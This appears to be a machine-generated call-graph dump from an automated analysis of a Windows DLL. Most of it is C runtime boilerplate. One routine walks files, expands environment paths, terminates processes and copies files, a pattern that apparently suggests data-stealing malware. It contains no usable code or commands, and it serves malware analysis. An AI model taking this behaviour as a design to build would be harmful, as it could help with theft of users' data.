              Total number of Nodes:2000
              Total number of Limit Nodes:31
6bef1a0d 17289->17290 17290->17271 17290->17272 17290->17277 17292 6bef17ce _unexpected 5 API calls 17291->17292 17293 6bef16e5 17292->17293 17293->17290 17294 6bef1a59 17293->17294 17297 6bef16e9 17294->17297 17296 6bef1a64 17296->17289 17298 6bef17ce _unexpected 5 API calls 17297->17298 17299 6bef16ff 17298->17299 17299->17296 17300->17231 17302 6beedc53 __fread_nolock 39 API calls 17301->17302 17303 6bef4005 17302->17303 17304 6beedc53 __fread_nolock 39 API calls 17303->17304 17305 6bef4024 17304->17305 17306 6bef3fb9 17305->17306 17307 6bef0444 __freea 14 API calls 17305->17307 17308 6bef3fd7 17306->17308 17307->17306 17311 6bef3567 RtlLeaveCriticalSection 17308->17311 17310 6bef3fc5 17310->17193 17311->17310 17313 6beee93a 17312->17313 17314 6beee90b 17312->17314 17315 6beee951 17313->17315 17316 6bef0444 __freea 14 API calls 17313->17316 17314->17143 17317 6bef0444 __freea 14 API calls 17315->17317 17316->17313 17317->17314 16499 6bee4b49 16500 6bee4b54 16499->16500 16506 6bee4b63 16499->16506 16501 6bee4b79 16500->16501 16502 6bee4b59 16500->16502 16509 6bee4b9c 16501->16509 16503 6bee4b5e 16502->16503 16504 6bee4b6f 16502->16504 16503->16506 16523 6bee51de 16503->16523 16528 6bee51bf 16504->16528 16510 6bee4ba8 __FrameHandler3::FrameUnwindToState 16509->16510 16536 6bee524f 16510->16536 16512 6bee4baf 16513 6bee4c9b 16512->16513 16514 6bee4bd6 16512->16514 16520 6bee4c12 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 16512->16520 16555 6bee53ee IsProcessorFeaturePresent 16513->16555 16547 6bee51b1 16514->16547 16517 6bee4ca2 16518 6bee4be5 __RTC_Initialize 16518->16520 16550 6bee50d5 RtlInitializeSListHead 16518->16550 16520->16506 16521 6bee4bf3 16521->16520 16551 6bee5186 16521->16551 16696 6beeecbe 16523->16696 16785 6bee671c 16528->16785 16533 6bee51db 16533->16506 16534 6bee6727 21 API calls 16535 6bee51c8 16534->16535 16535->16506 16537 6bee5258 16536->16537 16559 6bee55eb IsProcessorFeaturePresent 16537->16559 16541 6bee526d 
16541->16512 16542 6bee5269 16542->16541 16569 6beeeca1 16542->16569 16545 6bee5284 16545->16512 16690 6bee5288 16547->16690 16549 6bee51b8 16549->16518 16550->16521 16552 6bee518b ___scrt_release_startup_lock 16551->16552 16553 6bee55eb IsProcessorFeaturePresent 16552->16553 16554 6bee5194 16552->16554 16553->16554 16554->16520 16556 6bee5404 __InternalCxxFrameHandler __fread_nolock 16555->16556 16557 6bee54af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16556->16557 16558 6bee54f3 __InternalCxxFrameHandler 16557->16558 16558->16517 16560 6bee5264 16559->16560 16561 6bee66fd 16560->16561 16578 6bee77a7 16561->16578 16564 6bee6706 16564->16542 16566 6bee670e 16567 6bee6719 16566->16567 16592 6bee77e3 16566->16592 16567->16542 16632 6bef4b10 16569->16632 16572 6bee672f 16573 6bee6738 16572->16573 16574 6bee6742 16572->16574 16575 6bee6868 ___vcrt_uninitialize_ptd 6 API calls 16573->16575 16574->16541 16576 6bee673d 16575->16576 16577 6bee77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16576->16577 16577->16574 16579 6bee77b0 16578->16579 16581 6bee77d9 16579->16581 16582 6bee6702 16579->16582 16596 6bee79ec 16579->16596 16583 6bee77e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16581->16583 16582->16564 16584 6bee6835 16582->16584 16583->16582 16613 6bee78fd 16584->16613 16589 6bee6865 16589->16566 16591 6bee684a 16591->16566 16593 6bee77ee 16592->16593 16595 6bee780d 16592->16595 16594 6bee77f8 RtlDeleteCriticalSection 16593->16594 16594->16594 16594->16595 16595->16564 16601 6bee7812 16596->16601 16599 6bee7a24 InitializeCriticalSectionAndSpinCount 16600 6bee7a0f 16599->16600 16600->16579 16602 6bee782f 16601->16602 16605 6bee7833 16601->16605 16602->16599 16602->16600 16603 6bee789b GetProcAddress 16603->16602 16605->16602 16605->16603 16606 6bee788c 16605->16606 16608 6bee78b2 LoadLibraryExW 16605->16608 16606->16603 16607 6bee7894 FreeLibrary 16606->16607 16607->16603 16609 6bee78f9 16608->16609 16610 6bee78c9 
GetLastError 16608->16610 16609->16605 16610->16609 16611 6bee78d4 ___vcrt_FlsSetValue 16610->16611 16611->16609 16612 6bee78ea LoadLibraryExW 16611->16612 16612->16605 16614 6bee7812 ___vcrt_FlsSetValue 5 API calls 16613->16614 16615 6bee7917 16614->16615 16616 6bee7930 TlsAlloc 16615->16616 16617 6bee683f 16615->16617 16617->16591 16618 6bee79ae 16617->16618 16619 6bee7812 ___vcrt_FlsSetValue 5 API calls 16618->16619 16620 6bee79c8 16619->16620 16621 6bee6858 16620->16621 16622 6bee79e3 TlsSetValue 16620->16622 16621->16589 16623 6bee6868 16621->16623 16622->16621 16624 6bee6872 16623->16624 16625 6bee6878 16623->16625 16627 6bee7938 16624->16627 16625->16591 16628 6bee7812 ___vcrt_FlsSetValue 5 API calls 16627->16628 16629 6bee7952 16628->16629 16630 6bee796a TlsFree 16629->16630 16631 6bee795e 16629->16631 16630->16631 16631->16625 16633 6bef4b20 16632->16633 16634 6bee5276 16632->16634 16633->16634 16637 6bef0258 16633->16637 16642 6bef0308 16633->16642 16634->16545 16634->16572 16641 6bef025f 16637->16641 16638 6bef02a2 GetStdHandle 16638->16641 16639 6bef0304 16639->16633 16640 6bef02b5 GetFileType 16640->16641 16641->16638 16641->16639 16641->16640 16643 6bef0314 __FrameHandler3::FrameUnwindToState 16642->16643 16654 6bef351f RtlEnterCriticalSection 16643->16654 16645 6bef031b 16655 6bef4fc4 16645->16655 16648 6bef0339 16674 6bef035f 16648->16674 16653 6bef0258 2 API calls 16653->16648 16654->16645 16656 6bef4fd0 __FrameHandler3::FrameUnwindToState 16655->16656 16657 6bef4ffa 16656->16657 16658 6bef4fd9 16656->16658 16677 6bef351f RtlEnterCriticalSection 16657->16677 16660 6bef0431 __dosmaperr 14 API calls 16658->16660 16661 6bef4fde 16660->16661 16662 6beedef9 __wsopen_s 39 API calls 16661->16662 16665 6bef032a 16662->16665 16665->16648 16668 6bef01a2 GetStartupInfoW 16665->16668 16666 6bef5006 16667 6bef5032 16666->16667 16678 6bef4f14 16666->16678 16685 6bef5059 16667->16685 16669 6bef01bf 16668->16669 16671 6bef0253 16668->16671 16670 6bef4fc4 40 API 
calls 16669->16670 16669->16671 16672 6bef01e7 16670->16672 16671->16653 16672->16671 16673 6bef0217 GetFileType 16672->16673 16673->16672 16689 6bef3567 RtlLeaveCriticalSection 16674->16689 16676 6bef034a 16676->16633 16677->16666 16679 6bef1658 _unexpected 14 API calls 16678->16679 16681 6bef4f26 16679->16681 16680 6bef4f33 16682 6bef0444 __freea 14 API calls 16680->16682 16681->16680 16683 6bef19b1 __wsopen_s 6 API calls 16681->16683 16684 6bef4f88 16682->16684 16683->16681 16684->16666 16688 6bef3567 RtlLeaveCriticalSection 16685->16688 16687 6bef5060 16687->16665 16688->16687 16689->16676 16691 6bee5298 16690->16691 16692 6bee5294 16690->16692 16693 6bee53ee 4 API calls 16691->16693 16695 6bee52a5 ___scrt_release_startup_lock 16691->16695 16692->16549 16694 6bee530e 16693->16694 16695->16549 16702 6beef46b 16696->16702 16699 6bee6727 16768 6bee676a 16699->16768 16703 6bee51e3 16702->16703 16704 6beef475 16702->16704 16703->16699 16705 6bef1930 _unexpected 6 API calls 16704->16705 16706 6beef47c 16705->16706 16706->16703 16707 6bef196f _unexpected 6 API calls 16706->16707 16708 6beef48f 16707->16708 16710 6beef332 16708->16710 16711 6beef34d 16710->16711 16712 6beef33d 16710->16712 16711->16703 16716 6beef353 16712->16716 16715 6bef0444 __freea 14 API calls 16715->16711 16717 6beef368 16716->16717 16718 6beef36e 16716->16718 16719 6bef0444 __freea 14 API calls 16717->16719 16720 6bef0444 __freea 14 API calls 16718->16720 16719->16718 16721 6beef37a 16720->16721 16722 6bef0444 __freea 14 API calls 16721->16722 16723 6beef385 16722->16723 16724 6bef0444 __freea 14 API calls 16723->16724 16725 6beef390 16724->16725 16726 6bef0444 __freea 14 API calls 16725->16726 16727 6beef39b 16726->16727 16728 6bef0444 __freea 14 API calls 16727->16728 16729 6beef3a6 16728->16729 16730 6bef0444 __freea 14 API calls 16729->16730 16731 6beef3b1 16730->16731 16732 6bef0444 __freea 14 API calls 16731->16732 16733 6beef3bc 16732->16733 16734 6bef0444 __freea 14 API calls 
16733->16734 16735 6beef3c7 16734->16735 16736 6bef0444 __freea 14 API calls 16735->16736 16737 6beef3d5 16736->16737 16742 6beef17f 16737->16742 16743 6beef18b __FrameHandler3::FrameUnwindToState 16742->16743 16758 6bef351f RtlEnterCriticalSection 16743->16758 16746 6beef195 16748 6bef0444 __freea 14 API calls 16746->16748 16749 6beef1bf 16746->16749 16748->16749 16759 6beef1de 16749->16759 16750 6beef1ea 16751 6beef1f6 __FrameHandler3::FrameUnwindToState 16750->16751 16763 6bef351f RtlEnterCriticalSection 16751->16763 16753 6beef200 16754 6beef420 _unexpected 14 API calls 16753->16754 16755 6beef213 16754->16755 16764 6beef233 16755->16764 16758->16746 16762 6bef3567 RtlLeaveCriticalSection 16759->16762 16761 6beef1cc 16761->16750 16762->16761 16763->16753 16767 6bef3567 RtlLeaveCriticalSection 16764->16767 16766 6beef221 16766->16715 16767->16766 16769 6bee51e8 16768->16769 16770 6bee6774 16768->16770 16769->16506 16776 6bee7973 16770->16776 16773 6bee79ae ___vcrt_FlsSetValue 6 API calls 16774 6bee678a 16773->16774 16781 6bee674e 16774->16781 16777 6bee7812 ___vcrt_FlsSetValue 5 API calls 16776->16777 16778 6bee798d 16777->16778 16779 6bee79a5 TlsGetValue 16778->16779 16780 6bee677b 16778->16780 16779->16780 16780->16773 16782 6bee6758 16781->16782 16783 6bee6765 16781->16783 16782->16783 16784 6beed5ab ___vcrt_freefls@4 14 API calls 16782->16784 16783->16769 16784->16783 16791 6bee67a3 16785->16791 16787 6bee51c4 16787->16535 16788 6beeecb3 16787->16788 16789 6beef5e8 __dosmaperr 14 API calls 16788->16789 16790 6bee51d0 16789->16790 16790->16533 16790->16534 16792 6bee67af GetLastError 16791->16792 16793 6bee67ac 16791->16793 16794 6bee7973 ___vcrt_FlsGetValue 6 API calls 16792->16794 16793->16787 16795 6bee67c4 16794->16795 16796 6bee6829 SetLastError 16795->16796 16797 6bee79ae ___vcrt_FlsSetValue 6 API calls 16795->16797 16804 6bee67e3 16795->16804 16796->16787 16799 6bee67dd __InternalCxxFrameHandler 16797->16799 16798 6bee6805 16800 6bee79ae 
___vcrt_FlsSetValue 6 API calls 16798->16800 16802 6bee6819 16798->16802 16799->16798 16801 6bee79ae ___vcrt_FlsSetValue 6 API calls 16799->16801 16799->16804 16800->16802 16801->16798 16803 6beed5ab ___vcrt_freefls@4 14 API calls 16802->16803 16803->16804 16804->16796 17323 6bee53c0 17324 6bee53cc 17323->17324 17328 6bee53e2 17324->17328 17329 6beeecc6 17324->17329 17326 6bee53da 17327 6bee672f ___scrt_uninitialize_crt 7 API calls 17326->17327 17327->17328 17330 6beeece3 ___scrt_uninitialize_crt 17329->17330 17331 6beeecd1 17329->17331 17330->17326 17332 6beeecdf 17331->17332 17334 6bef1e26 17331->17334 17332->17326 17337 6bef1cb7 17334->17337 17340 6bef1c0b 17337->17340 17341 6bef1c17 __FrameHandler3::FrameUnwindToState 17340->17341 17348 6bef351f RtlEnterCriticalSection 17341->17348 17343 6bef1c21 ___scrt_uninitialize_crt 17344 6bef1c8d 17343->17344 17349 6bef1b7f 17343->17349 17357 6bef1cab 17344->17357 17348->17343 17350 6bef1b8b __FrameHandler3::FrameUnwindToState 17349->17350 17360 6beecc7d RtlEnterCriticalSection 17350->17360 17352 6bef1b95 ___scrt_uninitialize_crt 17356 6bef1bce 17352->17356 17361 6bef1dc1 17352->17361 17374 6bef1bff 17356->17374 17407 6bef3567 RtlLeaveCriticalSection 17357->17407 17359 6bef1c99 17359->17332 17360->17352 17362 6bef1dd6 __vfwprintf_l 17361->17362 17363 6bef1ddd 17362->17363 17364 6bef1de8 17362->17364 17365 6bef1cb7 ___scrt_uninitialize_crt 68 API calls 17363->17365 17366 6bef1d58 __vfwprintf_l 64 API calls 17364->17366 17373 6bef1de3 17365->17373 17367 6bef1df2 17366->17367 17370 6beeeea2 __fread_nolock 39 API calls 17367->17370 17367->17373 17368 6bee7d4e __vfwprintf_l 39 API calls 17369 6bef1e20 17368->17369 17369->17356 17371 6bef1e09 17370->17371 17377 6bef7a65 17371->17377 17373->17368 17406 6beecc91 RtlLeaveCriticalSection 17374->17406 17376 6bef1bed 17376->17343 17378 6bef7a76 17377->17378 17379 6bef7a83 17377->17379 17381 6bef0431 __dosmaperr 14 API calls 17378->17381 17380 6bef7acc 17379->17380 17384 6bef7aaa 
17379->17384 17382 6bef0431 __dosmaperr 14 API calls 17380->17382 17383 6bef7a7b 17381->17383 17385 6bef7ad1 17382->17385 17383->17373 17388 6bef79c3 17384->17388 17387 6beedef9 __wsopen_s 39 API calls 17385->17387 17387->17383 17389 6bef79cf __FrameHandler3::FrameUnwindToState 17388->17389 17401 6bef5062 RtlEnterCriticalSection 17389->17401 17391 6bef79de 17392 6bef52de __wsopen_s 39 API calls 17391->17392 17399 6bef7a23 17391->17399 17394 6bef7a0a FlushFileBuffers 17392->17394 17393 6bef0431 __dosmaperr 14 API calls 17395 6bef7a2a 17393->17395 17394->17395 17396 6bef7a16 GetLastError 17394->17396 17402 6bef7a59 17395->17402 17397 6bef041e __dosmaperr 14 API calls 17396->17397 17397->17399 17399->17393 17401->17391 17405 6bef5117 RtlLeaveCriticalSection 17402->17405 17404 6bef7a42 17404->17383 17405->17404 17406->17376 17407->17359 17817 6bee633a 17820 6bee6388 17817->17820 17821 6bee6345 17820->17821 17822 6bee6391 17820->17822 17822->17821 17829 6bee6795 17822->17829 17825 6bee6795 __InternalCxxFrameHandler 49 API calls 17826 6bee63d7 17825->17826 17843 6beeed08 17826->17843 17830 6bee67a3 __InternalCxxFrameHandler 23 API calls 17829->17830 17831 6bee679a 17830->17831 17832 6bee63cc 17831->17832 17849 6bef4c7b 17831->17849 17832->17825 17835 6beeed54 17837 6beeed5e IsProcessorFeaturePresent 17835->17837 17838 6beeed7d 17835->17838 17839 6beeed6a 17837->17839 17879 6beee4c9 17838->17879 17841 6beedcfd __InternalCxxFrameHandler 8 API calls 17839->17841 17841->17838 17844 6beeed14 __FrameHandler3::FrameUnwindToState 17843->17844 17845 6beef497 _unexpected 39 API calls 17844->17845 17848 6beeed19 17845->17848 17846 6beeed44 __FrameHandler3::FrameUnwindToState 39 API calls 17847 6beeed43 17846->17847 17848->17846 17882 6bef4ba9 17849->17882 17852 6bef4cc0 17853 6bef4ccc __FrameHandler3::FrameUnwindToState 17852->17853 17854 6beef5e8 __dosmaperr 14 API calls 17853->17854 17855 6bef4d1c 17853->17855 17857 6bef4d2e __InternalCxxFrameHandler 17853->17857 17862 6bef4cfd 
__InternalCxxFrameHandler 17853->17862 17854->17862 17856 6bef0431 __dosmaperr 14 API calls 17855->17856 17858 6bef4d21 17856->17858 17859 6bef4d64 __InternalCxxFrameHandler 17857->17859 17893 6bef351f RtlEnterCriticalSection 17857->17893 17860 6beedef9 __wsopen_s 39 API calls 17858->17860 17864 6bef4e9e 17859->17864 17865 6bef4da1 17859->17865 17875 6bef4dcf 17859->17875 17878 6bef4d06 17860->17878 17862->17855 17862->17857 17862->17878 17867 6bef4ea9 17864->17867 17898 6bef3567 RtlLeaveCriticalSection 17864->17898 17871 6beef497 _unexpected 39 API calls 17865->17871 17865->17875 17868 6beee4c9 __InternalCxxFrameHandler 21 API calls 17867->17868 17870 6bef4eb1 17868->17870 17873 6bef4dc4 17871->17873 17872 6beef497 _unexpected 39 API calls 17876 6bef4e24 17872->17876 17874 6beef497 _unexpected 39 API calls 17873->17874 17874->17875 17894 6bef4e4a 17875->17894 17877 6beef497 _unexpected 39 API calls 17876->17877 17876->17878 17877->17878 17878->17835 17900 6beee306 17879->17900 17883 6bef4bb5 __FrameHandler3::FrameUnwindToState 17882->17883 17888 6bef351f RtlEnterCriticalSection 17883->17888 17885 6bef4bc3 17889 6bef4c05 17885->17889 17888->17885 17892 6bef3567 RtlLeaveCriticalSection 17889->17892 17891 6beeed49 17891->17835 17891->17852 17892->17891 17893->17859 17895 6bef4e4e 17894->17895 17897 6bef4e16 17894->17897 17899 6bef3567 RtlLeaveCriticalSection 17895->17899 17897->17872 17897->17876 17897->17878 17898->17867 17899->17897 17901 6beee333 17900->17901 17910 6beee344 17900->17910 17911 6beee3ce GetModuleHandleW 17901->17911 17906 6beee382 17918 6beee1d1 17910->17918 17912 6beee338 17911->17912 17912->17910 17913 6beee429 GetModuleHandleExW 17912->17913 17914 6beee468 GetProcAddress 17913->17914 17915 6beee47c 17913->17915 17914->17915 17916 6beee48f FreeLibrary 17915->17916 17917 6beee498 17915->17917 17916->17917 17917->17910 17919 6beee1dd __FrameHandler3::FrameUnwindToState 17918->17919 17933 6bef351f RtlEnterCriticalSection 17919->17933 17921 6beee1e7 
17934 6beee21e 17921->17934 17923 6beee1f4 17938 6beee212 17923->17938 17926 6beee39d 17963 6beee410 17926->17963 17928 6beee3a7 17929 6beee3bb 17928->17929 17930 6beee3ab GetCurrentProcess TerminateProcess 17928->17930 17931 6beee429 __InternalCxxFrameHandler 3 API calls 17929->17931 17930->17929 17932 6beee3c3 ExitProcess 17931->17932 17933->17921 17936 6beee22a __InternalCxxFrameHandler __FrameHandler3::FrameUnwindToState 17934->17936 17935 6beee28e __InternalCxxFrameHandler 17935->17923 17936->17935 17941 6beeeb1d 17936->17941 17962 6bef3567 RtlLeaveCriticalSection 17938->17962 17940 6beee200 17940->17906 17940->17926 17942 6beeeb29 __EH_prolog3 17941->17942 17945 6beee9e8 17942->17945 17944 6beeeb50 __InternalCxxFrameHandler 17944->17935 17946 6beee9f4 __FrameHandler3::FrameUnwindToState 17945->17946 17953 6bef351f RtlEnterCriticalSection 17946->17953 17948 6beeea02 17954 6beeea43 17948->17954 17953->17948 17955 6beeea0f 17954->17955 17956 6beeea62 17954->17956 17958 6beeea37 17955->17958 17956->17955 17957 6bef0444 __freea 14 API calls 17956->17957 17957->17955 17961 6bef3567 RtlLeaveCriticalSection 17958->17961 17960 6beeea20 17960->17944 17961->17960 17962->17940 17966 6bef35a3 17963->17966 17965 6beee415 __InternalCxxFrameHandler 17965->17928 17967 6bef35b2 __InternalCxxFrameHandler 17966->17967 17968 6bef35bf 17967->17968 17970 6bef1853 17967->17970 17968->17965 17971 6bef17ce _unexpected 5 API calls 17970->17971 17972 6bef186f 17971->17972 17972->17968 18728 6beecc31 18729 6bef1e26 ___scrt_uninitialize_crt 68 API calls 18728->18729 18730 6beecc39 18729->18730 18738 6bef1ad4 18730->18738 18732 6beecc3e 18733 6bef1e2f __DllMainCRTStartup@12 14 API calls 18732->18733 18734 6beecc4d RtlDeleteCriticalSection 18733->18734 18734->18732 18735 6beecc68 18734->18735 18736 6bef0444 __freea 14 API calls 18735->18736 18737 6beecc73 18736->18737 18739 6bef1ae0 __FrameHandler3::FrameUnwindToState 18738->18739 18748 6bef351f RtlEnterCriticalSection 18739->18748 18741 
6bef1b57 18749 6bef1b76 18741->18749 18743 6bef1aeb 18743->18741 18745 6bef1b2b RtlDeleteCriticalSection 18743->18745 18747 6beecec7 __DllMainCRTStartup@12 69 API calls 18743->18747 18746 6bef0444 __freea 14 API calls 18745->18746 18746->18743 18747->18743 18748->18743 18752 6bef3567 RtlLeaveCriticalSection 18749->18752 18751 6bef1b63 18751->18732 18752->18751 16805 6bee4e89 16806 6bee4e97 16805->16806 16807 6bee4e92 16805->16807 16811 6bee4d53 16806->16811 16825 6bee508a 16807->16825 16812 6bee4d5f __FrameHandler3::FrameUnwindToState 16811->16812 16813 6bee4d88 dllmain_raw 16812->16813 16814 6bee4d83 16812->16814 16823 6bee4d6e 16812->16823 16815 6bee4da2 dllmain_crt_dispatch 16813->16815 16813->16823 16829 6bee1000 16814->16829 16815->16814 16815->16823 16826 6bee50a0 16825->16826 16828 6bee50a9 16826->16828 16924 6bee503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16826->16924 16828->16806 16830 6bee1012 16829->16830 16831 6bee1010 16829->16831 16834 6bee4402 16830->16834 16835 6bee4430 __fread_nolock 16834->16835 16880 6bee171f 16835->16880 16838 6bee1135 __DllMainCRTStartup@12 44 API calls 16839 6bee4456 __DllMainCRTStartup@12 _strlen 16838->16839 16840 6bee1075 __DllMainCRTStartup@12 43 API calls 16839->16840 16841 6bee44ae 16840->16841 16842 6beed5ab ___vcrt_freefls@4 14 API calls 16841->16842 16843 6bee44b9 GetEnvironmentVariableW 16842->16843 16844 6bee1135 __DllMainCRTStartup@12 44 API calls 16843->16844 16845 6bee44e6 __DllMainCRTStartup@12 _strlen 16844->16845 16846 6bee1075 __DllMainCRTStartup@12 43 API calls 16845->16846 16847 6bee4545 16846->16847 16848 6beed5ab ___vcrt_freefls@4 14 API calls 16847->16848 16849 6bee4550 16848->16849 16850 6bee1135 __DllMainCRTStartup@12 44 API calls 16849->16850 16851 6bee4567 __DllMainCRTStartup@12 _strlen 16850->16851 16852 6bee1075 __DllMainCRTStartup@12 43 API calls 16851->16852 16853 6bee45bc 16852->16853 16854 6beed5ab ___vcrt_freefls@4 14 API calls 16853->16854 16855 
6bee45c7 16854->16855 16856 6bee1135 __DllMainCRTStartup@12 44 API calls 16855->16856 16857 6bee45de __DllMainCRTStartup@12 _strlen 16856->16857 16858 6bee1075 __DllMainCRTStartup@12 43 API calls 16857->16858 16859 6bee4636 16858->16859 16860 6beed5ab ___vcrt_freefls@4 14 API calls 16859->16860 16922 6bee6180 16880->16922 16883 6bee1135 __DllMainCRTStartup@12 44 API calls 16885 6bee1775 __DllMainCRTStartup@12 _strlen 16883->16885 16884 6bee17d8 GetProcAddress 16886 6beed5ab ___vcrt_freefls@4 14 API calls 16884->16886 16885->16884 16887 6bee17f5 16886->16887 16888 6bee1135 __DllMainCRTStartup@12 44 API calls 16887->16888 16890 6bee1806 __DllMainCRTStartup@12 _strlen 16888->16890 16889 6bee1869 GetProcAddress 16891 6beed5ab ___vcrt_freefls@4 14 API calls 16889->16891 16890->16889 16892 6bee1886 16891->16892 16893 6bee1135 __DllMainCRTStartup@12 44 API calls 16892->16893 16895 6bee1897 __DllMainCRTStartup@12 _strlen 16893->16895 16894 6bee18fa GetProcAddress 16896 6beed5ab ___vcrt_freefls@4 14 API calls 16894->16896 16895->16894 16897 6bee1917 16896->16897 16898 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 16897->16898 16899 6bee1927 16898->16899 16899->16838 16923 6bee174a GetModuleHandleW 16922->16923 16923->16883 16924->16828 17980 6bef4b07 17981 6bef4b20 17980->17981 17982 6bef4b3e 17980->17982 17981->17982 17983 6bef0258 2 API calls 17981->17983 17984 6bef0308 44 API calls 17981->17984 17983->17981 17984->17981 14330 6bee1c1a 14331 6bee1c21 14330->14331 14332 6bee1fbf 14331->14332 14338 6bee1c2b 14331->14338 14734 6bee32d8 14332->14734 14334 6bee1c47 14335 6bee1fd2 14336 6bee32d8 __DllMainCRTStartup@12 39 API calls 14335->14336 14337 6bee1fe1 14336->14337 14737 6bee4ad5 14337->14737 14338->14334 14340 6bee1fa5 FindNextFileW 14338->14340 14349 6bee1d10 __DllMainCRTStartup@12 _strlen 14338->14349 14365 6bee1075 14338->14365 14368 6bee1b85 14338->14368 14340->14334 14340->14338 14342 6bee1ffc 14345 6bee1075 __DllMainCRTStartup@12 43 
API calls 14346 6bee1f5e TerminateProcess CloseHandle CloseHandle 14345->14346 14691 6bee2004 14346->14691 14349->14345 14350 6bee1075 __DllMainCRTStartup@12 43 API calls 14349->14350 14406 6bee1135 14349->14406 14409 6beed5ab 14349->14409 14350->14349 14356 6bee32d8 39 API calls __DllMainCRTStartup@12 14360 6bee1db2 14356->14360 14358 6bee3389 __DllMainCRTStartup@12 40 API calls 14358->14360 14359 6bee33f1 40 API calls __DllMainCRTStartup@12 14359->14360 14360->14356 14360->14358 14360->14359 14363 6bee1075 __DllMainCRTStartup@12 43 API calls 14360->14363 14416 6bee3854 14360->14416 14419 6bee32f1 14360->14419 14423 6bee32c2 14360->14423 14426 6bee16ba 14360->14426 14430 6bee2430 CoInitialize 14360->14430 14364 6bee1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 14363->14364 14364->14338 14744 6bee1035 14365->14744 14369 6bee1bca __DllMainCRTStartup@12 14368->14369 14370 6bee1075 __DllMainCRTStartup@12 43 API calls 14369->14370 14371 6bee1bfd FindFirstFileW 14370->14371 14372 6bee1c21 14371->14372 14373 6bee1fbf 14372->14373 14383 6bee1c2b 14372->14383 14374 6bee32d8 __DllMainCRTStartup@12 39 API calls 14373->14374 14376 6bee1fd2 14374->14376 14375 6bee1c47 14375->14338 14377 6bee32d8 __DllMainCRTStartup@12 39 API calls 14376->14377 14378 6bee1fe1 14377->14378 14379 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14378->14379 14382 6bee1ffc 14379->14382 14380 6bee1fa5 FindNextFileW 14380->14375 14380->14383 14381 6bee1075 __DllMainCRTStartup@12 43 API calls 14381->14383 14382->14338 14383->14375 14383->14380 14383->14381 14384 6bee1b85 __DllMainCRTStartup@12 92 API calls 14383->14384 14390 6bee1d10 __DllMainCRTStartup@12 _strlen 14383->14390 14384->14383 14385 6bee1135 __DllMainCRTStartup@12 44 API calls 14385->14390 14386 6bee1075 __DllMainCRTStartup@12 43 API calls 14387 6bee1f5e TerminateProcess CloseHandle CloseHandle 14386->14387 14388 6bee2004 __DllMainCRTStartup@12 81 API calls 14387->14388 14389 6bee1fa3 14388->14389 
14389->14380 14390->14385 14390->14386 14391 6bee1075 __DllMainCRTStartup@12 43 API calls 14390->14391 14392 6beed5ab ___vcrt_freefls@4 14 API calls 14390->14392 14391->14390 14393 6bee1d89 ExpandEnvironmentStringsW 14392->14393 14394 6bee3389 __DllMainCRTStartup@12 40 API calls 14393->14394 14403 6bee1db2 14394->14403 14395 6bee3854 __DllMainCRTStartup@12 40 API calls 14395->14403 14396 6bee32f1 __DllMainCRTStartup@12 39 API calls 14396->14403 14397 6bee32d8 39 API calls __DllMainCRTStartup@12 14397->14403 14398 6bee32c2 __DllMainCRTStartup@12 40 API calls 14398->14403 14399 6bee3389 __DllMainCRTStartup@12 40 API calls 14399->14403 14400 6bee33f1 40 API calls __DllMainCRTStartup@12 14400->14403 14401 6bee16ba __DllMainCRTStartup@12 39 API calls 14401->14403 14402 6bee2430 __DllMainCRTStartup@12 78 API calls 14402->14403 14403->14395 14403->14396 14403->14397 14403->14398 14403->14399 14403->14400 14403->14401 14403->14402 14404 6bee1075 __DllMainCRTStartup@12 43 API calls 14403->14404 14405 6bee1e9a CopyFileW TerminateProcess CloseHandle CloseHandle 14404->14405 14405->14383 15275 6bee10f5 14406->15275 14410 6bef0444 __freea 14 API calls 14409->14410 14411 6bee1d89 ExpandEnvironmentStringsW 14410->14411 14412 6bee3389 14411->14412 14413 6bee33bb __DllMainCRTStartup@12 14412->14413 15455 6bee38b4 14413->15455 15567 6bee3cbc 14416->15567 14418 6bee3869 __DllMainCRTStartup@12 14418->14360 14421 6bee3302 __DllMainCRTStartup@12 14419->14421 14420 6bee3308 __DllMainCRTStartup@12 14420->14360 14421->14420 15618 6bee34ca 14421->15618 15622 6bee329b 14423->15622 14427 6bee16ca __DllMainCRTStartup@12 14426->14427 14428 6bee32d8 __DllMainCRTStartup@12 39 API calls 14427->14428 14429 6bee171a 14428->14429 14429->14360 14431 6bee2491 14430->14431 14432 6bee249a 14431->14432 14433 6bee24eb 14431->14433 15643 6bee10c5 14432->15643 15647 6bee33f1 14433->15647 14440 6bee32d8 __DllMainCRTStartup@12 39 API calls 14443 6bee24c5 14440->14443 14442 6bee2519 15659 6bee1654 VariantInit 
14442->15659 14445 6bee32d8 __DllMainCRTStartup@12 39 API calls 14443->14445 14447 6bee24d1 14445->14447 14446 6bee253e 15660 6bee1654 VariantInit 14446->15660 14449 6bee32d8 __DllMainCRTStartup@12 39 API calls 14447->14449 14617 6bee24e0 14449->14617 14450 6bee2563 15661 6bee1654 VariantInit 14450->15661 14452 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14454 6bee325d 14452->14454 14453 6bee2588 15662 6bee16a8 VariantClear 14453->15662 14454->14360 14456 6bee25fb 15663 6bee16a8 VariantClear 14456->15663 14458 6bee260a 15664 6bee16a8 VariantClear 14458->15664 14617->14452 15921 6beecd5b 14691->15921 14695 6bee4ad5 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14697 6bee1fa3 14695->14697 14697->14340 14702 6beecd5b __DllMainCRTStartup@12 42 API calls 14703 6bee208f ___std_exception_copy 14702->14703 15949 6beedb99 14703->15949 14705 6bee20bb __DllMainCRTStartup@12 15952 6beecb0d 14705->15952 14733 6bee2065 14733->14695 14735 6bee34ca __DllMainCRTStartup@12 39 API calls 14734->14735 14736 6bee32e7 __DllMainCRTStartup@12 14735->14736 14736->14335 14738 6bee4ade IsProcessorFeaturePresent 14737->14738 14739 6bee4add 14737->14739 14741 6bee4f19 14738->14741 14739->14342 16498 6bee4edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14741->16498 14743 6bee4ffc 14743->14342 